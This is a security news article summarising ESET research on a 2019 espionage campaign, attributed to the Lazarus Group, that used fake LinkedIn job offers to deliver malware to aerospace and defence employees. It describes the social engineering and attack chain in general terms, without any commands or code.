News

Cyber Attackers Use Lucrative Job Offers via Linkedin to Snare Victims

Giulio Saggin
Giulio Saggin
Tuesday, 28 November 2023

Cyber attackers have used the lure of lucrative job offers via Linkedin to target aerospace and military company employees in Europe and the Middle East.

The attacks, which took place from September to December 2019, used a malware sample named 'Inception.dll' and are believed to be the work of North Korea's Lazarus Group.

"They were highly targeted and relied on social engineering over LinkedIn and custom, multistage malware," said researchers from ESET, who made the discovery. "To operate under the radar, the attackers frequently recompiled their malware, abused native Windows utilities and impersonated legitimate software and companies. To our knowledge, the malware hasn’t been previously documented."

The researchers believe the primary goal of the operation was espionage. However, in one case, attackers used a business email compromise attack as the final stage of the operation.

"First, leveraging existing communication in the victim’s emails, the attackers tried to manipulate a customer of the targeted company to pay a pending invoice to their bank account," said the researchers. "Rather than paying the invoice, the customer enquired about the requested sum ... (and) ended up contacting the victim’s correct email address about the issue, raising an alarm on the victim’s side."

THE ATTACKS

Contact was initially made via fictitious job offers using LinkedIn’s messaging feature. The attackers posed as HR people from well-known and credible aerospace and defense industry companies, such as General Dynamics and Collins Aerospace (formerly Rockwell Collins).

Once a successful contact was made, malicious files - disguised as documents pertinent to the job offer - were placed into the online conversation.

The malicious files were sent either via LinkedIn or via (fake) email and OneDrive. Once opened, the (LNK) file started a Command Prompt which opened a remote PDF file in the target’s default browser.

"That PDF, seemingly containing salary information for the reputed job positions, in reality served as a decoy," said the researchers. "In the background, the Command Prompt created a new folder and copied the WMI Commandline Utility to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied (WMI Commandline Utility)."

Once 'in', the attackers were able to use an arsenal of tools, including custom, multistage malware, and modified versions of open-source tools.

The attackers attempted to remain undetected by disguising files and folders with the names of well-established software and companies (Intel and Skype, to name two), digitally signing some components of their malware, recompiling the Stage 1 malware numerous times throughout the operation and implementing anti-analysis techniques in their custom malware.

Nothing firm linked the attacks to a known threat actor.

"However, said ESET, "the method of targeting, use of fake LinkedIn accounts, development environment, and anti-analysis techniques bore strong resemblance to those used by the Lazarus group."

ESET White Paper

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2024 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203